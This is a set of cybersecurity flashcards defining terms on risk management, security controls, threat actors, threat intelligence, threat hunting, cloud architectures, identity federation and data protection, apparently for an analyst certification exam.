The location where security professionals monitor and protect critical information assets in an organization.
Definition
The location where security professionals monitor and protect critical information assets in an organization.
Term
Cybersecurity service-level objectives (SLOs)
Definition
The standards that organizations and their leadership must meet to ensure the security of their network. These objectives help measure and assess how well security operations protect the organization's assets and assure its customers and stakeholders that systems and data are safe and secure.
Term
Risk Responses Risk management principles
Definition
[image]
Term
Risk avoidance
Definition
In risk mitigation, the practice of ceasing activity that presents risk.
Risk avoidance often means that you stop doing an activity that is risk-bearing
Term
Risk acceptance
Definition
The response of determining that a risk is within the organization's appetite and no countermeasures other than ongoing monitoring are needed.
Risk acceptance means continuing to operate without change after evaluating an identified risk item.
Term
Risk mitigation
Definition
The response of reducing risk to fit within an organization's willingness to accept risk.
By implementing effective mitigating controls, we can reduce the overall risk. We implement mitigating controls until risk levels are reduced to a level deemed "acceptable" by risk managers and governance teams.
Term
Risk transference
Definition
In risk mitigation, the response of moving or sharing the responsibility of risk to another entity, such as by purchasing cybersecurity insurance.
Risk transference (or sharing) means assigning risk to a third party, which is most typically accomplished through insurance policies
Term
Risk Management Exceptions
Definition
For example, a different risk response might be warranted, like avoidance. Circumstances may warrant a risk exception if a different risk response is not reasonable or feasible. Issuing a risk exception is a serious decision and must include careful documentation identifying why the risks are concerning and specific justifications describing why an exception is warranted.
Term
Threat modeling
Definition
The process of identifying and assessing the possible threat actors and attack vectors that pose a risk to the security of an app, network, or other system.
Threat modeling is designed to identify the principal risks and tactics, techniques and procedures (TTPs) that a system may be subject to by evaluating the system both from an attacker's point of view and from the defender's point of view.
Term
Technical Control
Definition
The control is implemented as a system (hardware, software, or firmware). For example, firewalls, antivirus software, and OS access control models are technical controls. Technical controls may also be described as logical controls.
Term
Operational
Definition
The control is implemented primarily by people rather than systems. For example, security guards and training programs are operational controls rather than technical controls.
Term
Managerial Control
Definition
The control gives oversight of the information system. Examples could include risk identification or a tool allowing the evaluation and selection of other security controls.
Term
Preventative
Definition
A type of security control that acts before an incident to eliminate or reduce the likelihood that an attack can succeed.
A preventative control operates before an attack can take place. Access control lists (ACL) configured on firewalls and file system objects are preventative-type controls. Antimalware software also acts as a preventative control, by blocking processes identified as malicious from executing. Directives and standard operating procedures (SOPs) can be thought of as administrative versions of preventative controls.
Term
Detective
Definition
A type of security control that acts during an incident to identify or record that it is happening.
The control may not prevent or deter access, but it will identify and record any attempted or successful intrusion. A detective control operates during the progress of an attack. Logs provide one of the best examples of detective-type controls.
Term
Corrective
Definition
A type of security control that acts after an incident to eliminate or minimize its impact
The control acts to eliminate or reduce the impact of an intrusion event. A corrective control is used after an attack. A good example is a backup system that can restore data that was damaged during an intrusion. Another example is a patch management system that acts to eliminate the vulnerability exploited during the attack.
Term
Compensating
Definition
A security measure that takes on risk mitigation when a primary control fails or cannot completely meet expectations.
The control serves as a substitute for a principal control, as recommended by a security standard, and affords the same (or better) level of protection but uses a different methodology or technology.
Term
Responsive Control
Definition
A type of security control that serves to direct corrective actions after an incident has been confirmed.
In a Security Operations Center (SOC), responsive controls might include several very well-defined actions to be taken by an analyst after identifying a specific issue. These actions are often documented in a playbook.
Term
Prioritization & Escalation
Definition
After identifying vulnerabilities, they must be classified according to their severity and potential impact on the organization. Vulnerabilities with the highest severity and potential impact must be prioritized and addressed first, while those with lower severity and potential impact can be addressed later. It is also important to ensure that any high-severity vulnerabilities are escalated to all relevant stakeholders to ensure they are informed and can contribute to the response as necessary.
Term
threat actor
Definition
Person or entity responsible for an event that has been identified as a security incident or as a risk.
Term
attack surface
Definition
The points at which a network or application receives external connections or inputs/outputs that are potential vectors to be exploited by a threat actor.
Each piece of software, service, and every enabled protocol on an endpoint offers a unique opportunity for attack. Removing or disabling as many of these as possible can significantly reduce the number of (potentially) exploitable pathways into a system. Additionally, default configurations typically favor functionality and compatibility over security, so it is essential to understand how to customize a system to allow for the most secure type of operation, not necessarily the most convenient.
Term
on-premises
Definition
Software or services installed and managed on a customer’s computing infrastructure rather than in the cloud or hosted by a third-party provider.
Term
Passive discovery (attack surface)
Definition
Passive discovery can be a practical approach to managing the attack surface. Passive discovery describes the methods used to identify systems, services, and protocols indirectly. Passive discovery, such as network packet capture, can reveal information about network-connected hosts, communications channels, protocols in use, and activity patterns. Passive discovery is beneficial as it leverages careful observation to show characteristics of network-connected software and devices.
Term
Edge discovery
(Attack Surface)
Definition
Edge discovery seeks to define the "edge" of the network fully. It is easy to assume that the edge is composed only of Internet-facing servers. The edge is instead composed of every device with Internet connectivity. Assuming that attacks will occur from the Internet, anything accessible to it must be considered as part of the edge.
Term
Security Control Testing
Definition
For these reasons, a testing plan must be in place and designed to validate controls are functioning as intended. For example, validating that firewalls only allow the right traffic to pass, that endpoint protection is operating properly on employee workstations, and that web application firewalls correctly identify and block injection attacks to name just a few.
Term
Penetration Testing
Definition
A penetration test involves hiring a trusted offensive security expert to fill the role of an attacker, tasking them to exploit the environment and evaluate the effectiveness of existing protections. The penetration test includes a findings report crafted with details regarding identified weaknesses and recommended remediations.
Term
Adversary Emulation
Definition
Another type of penetration test, referred to as adversary emulation, seeks to mimic the actions of known threat actor groups. The MITRE ATT&CK® framework typically forms the basis of this type of assessment. After a threat assessment identifies threat actor groups, the ATT&CK framework provides details regarding their tactics, techniques, and procedures (TTPs). Emulating these TTPs helps assess whether existing protections are sufficient to stop attacks characteristic of the threat actor.
Term
Bug Bounty
Definition
Involves offering rewards for responsible disclosure of vulnerabilities.
Bug bounties allow organizations to define areas of their environment they would like help protecting. The bug bounty identifies elements of the environment that are in scope for testing and the rewards available for reporting issues. This approach incentivizes offensive security professionals to assess controls on an ongoing basis and can also help identify unknown and undocumented vulnerabilities.
Term
ATTACK SURFACE REDUCTION Asset inventory
Definition
Conducting an inventory of all hardware and software assets and user accounts in the environment. Once identified, the team must determine which assets are essential for business operations and which can be removed.
Term
ATTACK SURFACE REDUCTION
Access control
Definition
Implementing strict access control measures, such as multifactor authentication, can reduce the attack surface significantly. Limiting access to sensitive data and systems reduces the risk of unauthorized access.
Term
Patching and updating
ATTACK SURFACE REDUCTION
Definition
Regularly patching and updating software and firmware can prevent attackers from exploiting known vulnerabilities. Patching should be performed via automated patch management systems.
Term
Network segmentation
ATTACK SURFACE REDUCTION
Definition
Segmenting a large network into smaller subnets can limit the damage an attacker can cause. By segmenting the network, the breaches and infections can be more effectively contained, thereby reducing the attack surface.
Term
Removing unnecessary components
ATTACK SURFACE REDUCTION
Definition
Removing hardware or software components reduces the attack surface. By removing software, the organization eliminates a pathway that attackers can exploit.
Term
Employee training
ATTACK SURFACE REDUCTION
Definition
Employee training can help reduce the attack surface by raising awareness of the potential risks and the importance of security measures. Regular training can help employees recognize and report potential security threats, reducing the likelihood of successful attacks
Term
Maintenance Windows
Definition
Many organizations adopt routine maintenance windows so administrators can perform maintenance tasks during these pre-established times. Maintenance windows enable preventative maintenance and consistent deployment of noncritical patches. All work planned during maintenance windows should comply with change management policies.
Term
nation-states
Definition
A type of threat actor that is supported by the resources of its host country's military and security services.
Term
organized crime
Definition
A type of threat actor that uses hacking and computer fraud for commercial gain.
Term
hacktivist
Definition
A threat actor that is motivated by a social issue or political cause
A hacktivist group, such as Anonymous, WikiLeaks, or LulzSec, uses cyber weapons to promote a political agenda.
Term
insider threat
Definition
Type of threat actor who is assigned privileges on the system and causes an intentional or unintentional incident.
Term
script kiddie
Definition
An inexperienced, unskilled attacker that typically uses tools or scripts created by others.
A script kiddie is someone who uses hacker tools without necessarily understanding how they work or having the ability to craft new attacks. Script kiddie attacks might have no specific target or reasonable goal other than gaining attention or proving technical abilities. They can still cause significant harm and/or damage without proper safeguards and preparations.
Term
Supply Chain Access
Definition
These outside sources form the supply chain and can be exploited to gain access to an otherwise secured environment. For example, a vendor may supply software products so an attacker can work to gain access to the software supplier, whose security practices may be lackluster, to insert malicious code into the vendor software prior to delivery to the target organization. Similarly, an attacker can target a managed services organization that may have VPN access to several valuable targets. Lastly, an attacker may target an equipment supplier in order to insert malware, vulnerable hardware/software, or rogue components that are assembled into the final product.
Term
advanced persistent threat (APT)
Definition
An attacker's ability to obtain, maintain, and diversify access to network systems using exploits and malware.
APTs typically target large organizations, such as financial institutions, companies in healthcare, and other organizations that store large volumes of personally identifiable information (PII), especially when the PII describes important government and political figures.
Term
exploits
Definition
A specific method by which malware code infects a target host, often via some vulnerability in a software process.
Term
Metasploit
Definition
A platform for launching modularized attacks against known software vulnerabilities
Term
persistence
Definition
In cybersecurity, the ability of a threat actor to maintain covert access to a target host or network.
Term
Tactics, techniques, and procedures (TTPs)
Definition
Analysis of historical cyberattacks and adversary actions.
Term
user and entity behavior analytics (UEBA)
Definition
A system that can provide automated identification of suspicious activity by user accounts and computer hosts.
Term
Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK)
Definition
A knowledge base maintained by the MITRE Corporation for listing and explaining specific adversary tactics, techniques, and procedures.
Term
Reconnaissance
Definition
The actions taken to gather information about an individual or organization's computer systems and software. This typically involves collecting information such as the types of systems and software used, user account information, data types, and network configuration
Term
Open-source intelligence (OSINT)
Definition
Publicly available information plus the tools used to aggregate and search it.
Term
Publicly available information (OSINT)
Definition
An attacker can harvest information from public repositories and web searches. Available information includes categories such as the IP addresses of an organization's DNS servers; the range of addresses assigned to the organization; names, email addresses, and phone numbers of contacts within the organization; and the organization's physical address. This data is publicly available through Whois records, Securities and Exchange Commission (SEC) filings, telephone directories, and more.
Term
Social media (OSINT)
Definition
Attackers can use social media sites like Facebook and LinkedIn to find an organization's information. Depending on how much an organization or an organization's employees choose to share publicly, an attacker may find posts or user profiles that give away sensitive information or simply act as another vector or target for the attacker to take advantage of.
Term
HTML code (OSINT)
Definition
The HTML code of an organization's web page can provide information, such as IP addresses and names of web servers, operating system versions, file paths, and names of developers or administrators. The layout and organization of the code can reveal development practices, capabilities, and level of security awareness.
Term
Metadata (OSINT)
Definition
Attackers can run metadata scans on publicly available documents using a tool like Fingerprinting Organizations with Collected Archives (FOCA). For example, Microsoft Office documents posted on the Internet may not directly divulge sensitive information about an organization, but an attacker could extract useful information from its metadata, including the names of authors or anyone that made a change to the document. By using search engines, FOCA (https://github.com/ElevenPaths/FOCA) can cross-reference files with other domains to find and extract metadata.
Term
Government bulletins
(Defensive OSINT)
Definition
The government is responsible for protecting the country's constituents and the national infrastructure and publishing a wide variety of information and advice regarding observed threats. For example, the Department of Homeland Security and the Cybersecurity and Infrastructure Agency publish several types of cybersecurity guidance, including basic informational content and binding operational directives that federal agencies must implement.
Term
computer emergency response team (CERT)
Definition
The goal of a computer emergency response team (CERT) is to mitigate cybercrime and minimize damage by responding to incidents quickly. They work with local law enforcement, federal agencies, and other organizations to help prevent cyberattacks. CERTs coordinate responses to major events like natural disasters or terrorist attacks. Because of this, CERTs can provide knowledge and information regarding trending and observed attacks.
Term
computer security incident response team (CSIRT)
Definition
A computer security incident response team (CSIRT) is a group responsible for responding to security incidents involving computer systems. The team typically consists of information security professionals, network administrators, system administrators, legal representatives, and other stakeholders. The team’s goal is to respond to security incidents quickly and effectively while minimizing the impact to the organization.
Term
dark web
Definition
Resources on the Internet that are distributed between anonymized nodes and protected from general access by multiple layers of encryption and routing
The dark web serves as an operating platform for many cybercrimes. Threat actors utilize the dark web to organize their efforts and sell products such as credit card numbers, drugs, weapons, and malware. Observing this activity can provide insight to threat actor activities, future attacks, information regarding current tactics, and evidence of previously undiscovered breaches.
Term
Internal sources (Defensive OSINT)
Definition
It is important to consider that evidence regarding active threats, reconnaissance activities, and suspicious behavior exists within the environment being protected. Activity logs are a goldmine of information and operational insight and must be continuously collected and analyzed.
Term
Timeliness (Confidence levels)
Definition
The speed at which threat data is collected and disseminated to ensure it is up-to-date and relevant.
Term
Relevancy (Confidence levels)
Definition
The usefulness of the data in the context of a specific threat and the actionable insights and meaningful context it provides.
Term
Accuracy (Confidence levels)
Definition
The reliability and correctness of the threat data. For example, ensuring it is free from errors, bias, or false information.
Term
Closed-source
Definition
Closed-source data is derived from the provider's own research and analysis efforts, such as data from honeynets that they operate, plus information mined from its customers' systems, suitably anonymized. Most of the commercial feed (sometimes referred to as a paid feed) providers also market their own platform for processing and disseminating threat intelligence. There are also platform providers who do not produce their own security feeds.
Term
Information Sharing and Analysis Centers (ISACs)
Definition
A not-for-profit group set up to share sector-specific threat intelligence and security best practices among its members.
Information Sharing and Analysis Centers (ISACs) provide critical infrastructure owners and operators with cybersecurity information and services. They facilitate the sharing of threat information and best practices between the public and private sectors, allowing for the protection of vital assets. ISACs also provide advice on current and emerging cyber threats, helping to ensure a more secure cyber landscape.
Term
Incident Response (Threat Intelligence Sharing)
Definition
Threat intelligence sharing can help organizations respond to security incidents more effectively by providing information about threat actors' tactics, techniques, and procedures (TTPs). By sharing information with other organizations, incident responders can better understand the threat landscape and develop more effective incident response plans.
Term
Vulnerability Management
(Threat Intelligence Sharing)
Definition
Threat intelligence sharing can help organizations identify and prioritize vulnerabilities more effectively. Organizations can quickly identify and mitigate potential risks by sharing information about emerging threats and vulnerabilities before attackers exploit them.
Term
Risk Management (Threat Intelligence Sharing)
Definition
Threat intelligence sharing can help organizations manage risk more effectively by providing insight into emerging threats and attack trends. By leveraging threat intelligence, organizations can make more informed decisions about where to allocate resources and which security controls to implement to reduce risk.
Threat intelligence sharing can also help inform security engineering efforts. By understanding the TTPs threat actors use, security engineers can design and implement more effective security controls to prevent and detect attacks.
Term
threat hunting
Definition
A cybersecurity technique designed to detect the presence of threats that have not been discovered by normal security monitoring.
The purpose of threat hunting is to analyze routine activities and network traffic to identify potential anomalies indicative of malicious actions which may result in a complete breach. Threat hunting describes the methods used to identify malicious cyber activities within an organization's network in a systematic way. Threat hunting subscribes to an "assume breach" mentality, a crucial strategy designed to help protect against advanced cyberattacks, mitigate any intrusion's impact, and develop a procedural approach to cyber resilience.
Term
cyber threat intelligence
Definition
The process of investigating, collecting, analyzing, and disseminating information about emerging threats and threat sources
Term
lateral movement
Definition
The process by which an attacker is able to move from one part of a computing environment to another
Term
indicators of attack (IoAs)
Definition
Signs or clues indicating a malicious attack on a system or network is currently occurring. These include, but are not limited to, unusual network traffic, strange log file entries, or suspicious user account activity
Term
Crowdsourced
Definition
A process in which a large group of individuals, usually from the public, are asked to contribute to a project or task. It often involves the collection of ideas, information, opinions, or feedback from a wide range of people, typically through an online platform.
Term
managed security service providers (MSSP)
Definition
A third-party provision of security configuration and monitoring as an outsourced service.
Term
Misconfiguration Hunting (Focus Areas)
Definition
Misconfigurations in IT systems can create vulnerabilities that attackers can exploit. Misconfiguration hunting involves searching for misconfigured systems, services, or applications that attackers could exploit, including searching for weak passwords, open ports, or unpatched software.
Term
Isolated Network Hunting (Focus Areas)
Definition
Isolated networks, such as air-gapped networks or networks with limited connectivity to the internet, are often thought to be more secure. However, attackers can still target these networks by exploiting vulnerabilities in connected systems or through physical access. Isolated network hunting involves searching for vulnerabilities in physical access points that could be used to gain access to the isolated network.
Term
Business-critical Asset Hunting (Focus Areas)
Definition
Attackers often target business-critical assets, such as databases, servers, or applications. Business-critical asset hunting involves searching for vulnerabilities and threats that could impact these assets by searching for unauthorized access attempts, unusual traffic patterns, or suspicious activity that could indicate an attack. An organization's processes used to manage critical assets can also be targeted, such as new user creation, money transfer, access permission approvals, and other similar high-risk functions.
Term
Indicators of compromise (IoCs)
Definition
A sign that an asset or network has been attacked or is currently under attack.
Indicators of compromise (IoCs) are essentially pieces of forensic data providing evidence of a potential intrusion into a system or network. An IoC indicates a high likelihood of unauthorized access to a system or that a successful attack has occurred.
Indicators of compromise (IoCs) can be identified using digital forensics techniques, which analyze digital artifacts left behind on a compromised system or network. These artifacts include log files, memory dumps, network traffic, and file system information.
Some common IoCs include unusual outbound network traffic (such as large volumes of outbound DNS traffic), logins occurring from unexpected geographic locations, suspicious privileged user account behavior, unusual changes in log files, protocols associated with command-and-control activities, traffic to known questionable URLs or IP addresses, and distributed denial-of-service (DDoS) attacks.
Term
privileged user account
Definition
A user account with elevated access to a system and that is granted additional permissions that other user accounts do not have. These additional permissions allow privileged users to perform administrative tasks and access sensitive data.
Term
distributed denial-of-service (DDoS)
Definition
An attack that involves the use of infected Internet-connected computers and devices to disrupt the normal flow of traffic of a server or service by overwhelming the target with traffic.
Term
Active Defense
Definition
An active defense describes using offensive actions to outmaneuver an adversary to make an attack harder to execute. An active approach to cyber defense seeks to increase the likelihood that hackers will make a mistake and expose their existence or methods of attack. Active defense approaches can stop attacks in progress while gaining a greater understanding of attacker methodology.
Term
Honeypots
Definition
A host, network, or file set up with the purpose of luring attackers away from assets of actual value and/or discovering attack strategies and weaknesses in the security configuration
Term
High-interaction honeypots
Definition
Designed to mimic real production systems, making it difficult for attackers to tell the difference between the honeypot and a real system. This aims to capture more detailed attack information than can be accomplished by using a low-interaction honeypot, allowing security teams to understand an attacker better.
Term
Active decoy
Definition
A system designed to distract potential attackers away from an organization's critical systems and data. It creates a false environment that looks like a real system, complete with fake data, applications, and other elements. The decoy system is closely monitored to detect malicious activity and provide early warning and detailed insight into an attacker's tactics and techniques
Term
intrusion detection systems
Definition
A security appliance or software that analyzes data from a packet sniffer to identify traffic that violates policies or rules.
Term
System hardening
Definition
A process of making a host or app configuration secure by reducing its attack surface, through running only necessary services, installing monitoring software to protect against malware and intrusions, and establishing a maintenance schedule to ensure the system is patched to be secure against software exploits
Term
SAM Windows Registry Files stored in C:\Windows\System32\Config
Definition
Security Accounts Manager (SAM) stores username information for accounts used on the current computer
Term
SECURITY
Windows Registry Files stored in C:\Windows\System32\Config
Definition
Linked to the security database of the domain the current user is logged onto
Term
SOFTWARE Windows Registry Files stored in C:\Windows\System32\Config
Definition
Contains settings for software and the Windows operating system
Term
SYSTEM
Windows Registry Files stored in C:\Windows\System32\Config
Definition
Contains settings for drivers and file systems
Term
DEFAULT
Windows Registry Files stored in C:\Windows\System32\Config
Definition
Contains settings for the LocalSystem account profile
Term
Initialization file (INI) configuration file format standards
Definition
Uses key-value pairs associated using "=".
Term
eXtensible Markup Language (XML) configuration file format standards
Definition
Uses tag formatting similar to HTML and is often used by APIs to exchange information.
Term
YAML Ain’t Markup Language (YAML™) configuration file format standards
Definition
YAML files use ":" and careful indentation to associate groups of settings and are an increasingly popular format.
Term
JavaScript Object Notation (JSON) configuration file format standards
Definition
Similar formatting to YAML with the addition of {} and [] brackets to group settings. Typically, associated applications are written using JavaScript.
Term
System Processes
Definition
System processes are background tasks that run on a computer without user interaction and often without the user's knowledge. System processes, such as the operating system kernel and other system services, are essential for the operating system to manage system resources, such as memory, network connections, and hardware devices. System processes can also be used to launch applications and perform other tasks. Examples of system processes include antivirus scans, disk defragmentation, user authentication, printing, and system updates.
Term
Hardware Architecture
Definition
Hardware architecture describes the underlying technology used by a device to perform computational tasks. Operating systems and applications are designed to run on a specific hardware architecture. Different architectures emphasize different characteristics, such as scalability, raw processing power, power management, and other features. ARM and x86 architectures are common, with x86 dominating desktops, laptops, and server computers, and ARM architectures dominant in smartphones, tablets, and single-board computers like the Raspberry Pi. Software designed to run on one architecture cannot run on another without the use of an emulator.
Term
Virtualization
Definition
A computing environment where multiple independent operating systems can be installed to a single hardware platform and run simultaneously.
Term
containers
Definition
An operating system virtualization deployment containing everything required to run a service, application, or microservice
Term
microservices
Definition
A software architecture where components of the solution are conceived as highly decoupled services not dependent on a single platform type or technology.
Term
application virtualization
Definition
A software delivery model where the code runs on a server and is streamed to a client.
Term
Containerization
Definition
Application cell/container virtualization dispenses with the idea of a hypervisor and instead enforces resource separation at the operating system level. The OS defines isolated "cells" for each user instance to run in. Each cell or container is allocated CPU and memory resources, but the processes all run through the native OS kernel. These containers may run slightly different OS distributions but cannot run guest OSs of different types (you could not run Windows or Ubuntu in a Red Hat Linux container, for instance). Alternatively, the containers might run separate application processes, in which case the variables and libraries required by the application process are added to the container.
One of the best-known container virtualization products is Docker (docker.com)
Term
cloud deployment model
Definition
Classifying the ownership and management of a cloud as public, private, community, or hybrid.
A cloud deployment model is a specific model or style of cloud computing. A cloud deployment model defines how an organization distributes applications and services and where data is stored. It also helps to determine how many resources are available for specific applications.
Term
Public cloud
Definition
Cloud that is deployed for shared use by multiple independent tenants.
Public cloud is designed for public access and geared toward those without the budget, resources, or desire to build and manage a private cloud or data center. Services are hosted on a third-party infrastructure and accessed via the Internet. Examples include Amazon AWS, Microsoft Azure, Google Cloud, Linode, IBM Cloud, Oracle Cloud, and many others.
Term
Private cloud
Definition
Cloud that is deployed for use by a single entity.
Private cloud is designed, built, and managed in-house using hardware provided by a cloud provider service. Private clouds provide high levels of control over the infrastructure, but they typically require more up-front capital and ongoing maintenance than a public cloud.
Term
hybrid cloud
Definition
Cloud deployment that uses both private and public elements.
A hybrid cloud generally refers to the combination of resources in both a public and private cloud. It is a type of cloud computing that combines on-premises infrastructure, or a private cloud, with a public cloud. By doing this, organizations can benefit from the scalability and cost-effectiveness of the public cloud while maintaining the security and control of their private cloud.
Term
Serverless
Definition
A software architecture that runs functions within virtualized runtime containers in a cloud rather than on dedicated server instances
offerings, services such as authentication, web applications, and communications aren't developed and managed as applications running on VM instances within the cloud. Instead, the applications are developed as functions and microservices, each interacting with other functions to facilitate client requests. When the client requires some operation to be processed, the cloud spins up a container to run the code, performs the processing, and then destroys the container. Billing is based on execution time rather than hourly charges.
Term
virtual private cloud (VPC)
Definition
A private network segment made available to a single cloud consumer on a public cloud
Term
Software-defined networking (SDN)
Definition
APIs and compatible hardware/virtual appliances allowing for programmable network appliances and systems.
SDN abstracts physical network devices, like routers and switches, replacing them with a virtual control plane that makes all decisions regarding traffic management. SDN allows for building cloud-based networks using virtualized equivalents of physical routers, firewalls, and other network devices used in on-premises networks. SDN architectures support security applications because the central controller allows data planes to be rapidly reprogrammed using automated provisioning and policy-based controls.
Term
Zero Trust architectures
Definition
Zero Trust architectures assume that nothing should be taken for granted and that all network access must be continuously verified and authorized. Any user, device, or application seeking access must be authenticated and verified. Zero Trust differs from traditional security models based on simply granting access to all users, devices, and applications contained within an organization's trusted network.
Term
key benefits of a Zero Trust architecture
Definition
• Greater security: All users, devices, and applications authenticated and verified before network access.
• Better access controls: More stringent limits regarding who or what can access resources and from what locations resources can be accessed.
• Improved governance and compliance: Limits on data access and greater operational visibility on user and device activity.
• Increased granularity: Users granted access to what they need when they need it.
Term
Secure Access Service Edge (SASE)
Definition
A networking and security architecture that provides secure access to cloud applications and services while reducing complexity. It combines security services like firewalls, identity and access management, and secure web gateway with networking services such as SD-WAN.
Term
Two-Factor Authentication (2FA)
Definition
Strong authentication mechanism that requires a user to submit two different types of credential, such as a fingerprint scan plus PIN. Often, the second credential is transmitted via a second trusted device or account. This is also referred to as 2-step verification.
Term
Authentication Factors
Definition
Something You Know
A knowledge factor such as a password or PIN.
Something You Have
A physical factor: an object in your possession, such as a card or token.
Something You Are
A physiological attribute, biometrics, such as fingerprint, hand-vein, facial recognition, and others.
Term
out-of-band mechanism
Definition
Use of a communication channel that is different than the one currently being used.
An out-of-band mechanism generates a software token on a server and sends it to a resource assumed to be safely controlled by the user.
Term
In-band authentication
Definition
Use of a communication channel that is the same as the one currently being used.
In-band authentication describes the use of authentication factors that rely on the same system requesting the authentication; for example, providing username and password credentials on a standalone server.
Term
standalone server
Definition
A server that is not integrated into a Microsoft Active Directory domain
Term
Passwordless Authentication
Definition
Passwordless authentication is a method by which users can access an account without entering a password. This type of authentication relies on biometric authentication, such as facial recognition, fingerprint scanning, voice recognition, or a one-time code sent to a user's email address or phone number. Passwordless authentication methods are gaining popularity as organizations look for methods to improve the quality, reliability, and rigor of authentication. Passwordless authentication offers a method of authentication that cannot be easily shared (unlike a password) and removes the burden of remembering passwords from employees. Passwordless authentication allows devices to recognize authorized users by using their unique physical characteristics instead of their memory of a password.
Term
Single sign-on (SSO)
Definition
Authentication technology that enables a user to authenticate once and receive authorizations for multiple services.
Term
Privileged Access Management (PAM)
Definition
Policies, procedures, and support software for managing accounts and credentials with administrative permissions.
PAM solutions can store the login credentials of privileged accounts in a secure repository and require additional authentication measures for any entity wishing to use them. Doing so tracks and logs who accessed and used privileged credentials at any time, allowing for greater awareness and visibility into their use.
Term
Federation
Definition
A process that provides a shared login capability across multiple systems and enterprises. It essentially connects the identity management services of multiple systems
Federation means that the company trusts accounts created and managed by a different network. As another example, a person might want to use both Google Apps and Twitter. If Google and Twitter establish a federated network for the purpose of authentication and authorization, then the user can log on to Twitter using his or her Google credentials or vice versa.
Term
OpenID
Definition
An identity federation method that enables users to be authenticated on cooperating websites by a third-party authentication service
OpenID is a method of authenticating users with certain sites that participate in an OpenID system. This enables them to retain a single account for all participating sites. A user will register with an OpenID system in a given domain like they would with any other account. A site under this OpenID domain will then give the user the option to sign in using this system. Then the site contacts its external OpenID provider in order to verify that the login credentials supplied by the user are correct. Large companies, such as Google and Amazon, use their own OpenID systems. OpenID Direct adds a layer of authentication to OAuth 2.0, the latest version of the protocol.
Term
Security Assertion Markup Language (SAML)
Definition
An XML-based data format used to exchange authentication information between a client and a service
Term
Simple Object Access Protocol (SOAP)
Definition
An XML-based web services protocol that is used to exchange messages.
Term
Shibboleth
Definition
An identity federation method that provides single sign-on capabilities and enables websites to make informed authorization decisions for access to protected online resources.
Shibboleth is a federated identity method based on SAML and is often used by universities and public service organizations. In a Shibboleth implementation, a user attempts to retrieve resources from a Shibboleth-enabled website, which then sends SAML authentication information over URL queries. The user is then redirected to an identity provider with which they can authenticate using this SAML information. The identity provider then responds to the service provider (the Shibboleth-enabled website) with the proper authentication information. The site validates this response and grants the user access to certain resources based on their SAML information.
Term
trust model
Definition
In PKI, a description of how users and different CAs exchange information and certificates.
Term
cloud access security broker (CASB)
Definition
Enterprise management software designed to mediate access to cloud services by users across all types of devices.
Term
CASBs are implemented in one of three ways
Forward proxy
Definition
This is a security appliance or host positioned at the client network edge that forwards user traffic to the cloud network if the contents of that traffic comply with policy. This requires configuration of users' devices or installation of an agent. In this mode, the proxy can inspect all traffic in real time, even if that traffic is not bound for sanctioned cloud applications. The problem with this mode is that users may be able to evade the proxy and connect directly. Proxies are also associated with poor performance as without a load balancing solution they become a bottleneck and potentially a single point of failure.
Term
CASBs are implemented in one of three ways
Reverse proxy
Definition
This is positioned at the cloud network edge and directs traffic to cloud services if the contents of that traffic comply with policy. This does not require configuration of the users' devices. This approach is only possible if the cloud application has proxy support.
Term
CASBs are implemented in one of three ways
Application programming interface (API)
Definition
Rather than placing a CASB appliance or host inline with cloud consumers and the cloud services, an API-based CASB brokers connections between the cloud service and the cloud consumer. For example, if a user account has been disabled or an authorization has been revoked on the local network, the CASB would communicate this to the cloud service and use its API to disable access there too. This depends on the API supporting the range of functions that the CASB and access and authorization policies demand. CASB solutions are quite likely to use both proxy and API modes for different security management purposes.
Term
Data loss prevention (DLP)
Definition
A software solution that detects and prevents sensitive information from being stored on unauthorized systems or transmitted over unauthorized networks.
Data loss prevention (DLP) products automate the discovery and classification of data types and enforce rules so that data is not viewed or transferred without proper authorization.
Term
Personally identifiable information (PII)
Definition
Data that can be used to identify or contact an individual (or, in the case of identity theft, to impersonate them).
Term
Protected Health Information (PHI)
Definition
Data that can be used to identify an individual and includes information about past, present, or future health, as well as related payments and data used in the operation of a healthcare business.
Term
Personally Identifiable Financial Information (PIFI)
Definition
Personal information about a consumer provided to a financial institution that can include account number, credit/debit card number, name, social security number and other information.
Term
Cardholder data (CHD)
Definition
Any type of personally identifiable information (PII) associated with a person who has a payment card, such as a credit or debit card.
Cardholder data (CHD) is information related to the owner of a payment card, such as a credit or debit card. This data includes the cardholder's name, card number, expiration date, billing address, and security code (CVV). Protections for cardholder data are provided in industry standards and privacy regulations such as Payment Card Industry Data Security Standard (PCI DSS), the General Data Protection Regulation (GDPR), Gramm-Leach-Bliley Act (GLBA), and others.
Term
Intellectual property (IP)
Definition
Data that is of commercial value and can be granted rights of ownership, such as copyrights, patents, and trademarks.
Intellectual property (IP) describes intangible products of human thought and ingenuity. Intellectual property is protected by various laws such as copyrights, patents, trademarks, and trade secrets. Intellectual property often represents vast sums of investment money and research time and provides significant competitive or military advantage.
Term
Public key infrastructure (PKI)
Definition
Framework of certificate authorities, digital certificates, software, services, and other cryptographic components deployed for the purpose of validating subject identities.
Term
Secure socket layer (SSL)
Definition
The original, obsolete version of the security protocol now developed as TLS.
Term
Secure Sockets Layer (SSL) Inspection
Definition
Secure socket layer (SSL) inspection is the process of inspecting encrypted HTTPS traffic. Without SSL inspection, network administrators cannot monitor encrypted traffic for threats, making HTTPS traffic an easy method for attackers to avoid detection. SSL inspection is also essential for verifying that website certificates are valid, helping protect against on-path (man-in-the-middle) attacks, where an attacker intercepts communications between two parties, and detecting traffic encrypted with anything other than a trusted third-party certificate. SSL inspection also helps enforce organizational policies, ensuring that employees comply with acceptable use policies and do not attempt to access restricted content or share/upload restricted data. SSL inspection is often accomplished by installing digital certificates on end devices that allow encrypted traffic to be intercepted, decrypted, and inspected by security tools or software before being re-encrypted and forwarded to the intended destination. Web proxies, load balancers, next-gen firewalls, and similar devices all support this capability.
Term
Log Ingestion
Definition
Log ingestion describes collecting log data from multiple sources, such as authentication servers, application servers, web servers, and databases, and storing it in a centralized location for analysis. It often involves using logging tools like Splunk and Logstash to collect and process log data from these systems to provide a comprehensive view of the infrastructure and the activities taking place within it.
Term
Time Synchronization
Definition
Time synchronization ensures that computer systems have accurate system time and time-related information by synchronizing the system time with a reference time source, using Network Time Protocol (NTP), an atomic clock, or a global positioning system (GPS). Time synchronization is essential to establish a clear event order.
Term
Logging Levels
Definition
Logging levels refer to the severity or importance of a log message. Common logging levels include the following:
• DEBUG: used for debugging purposes
• INFO: used for informative messages
• WARNING: used to indicate a potential problem
• ERROR: used to indicate a serious problem
• CRITICAL: used to indicate a critical problem
Syslog uses eight logging levels, starting from the most severe (level 0) to the least severe (level 7).
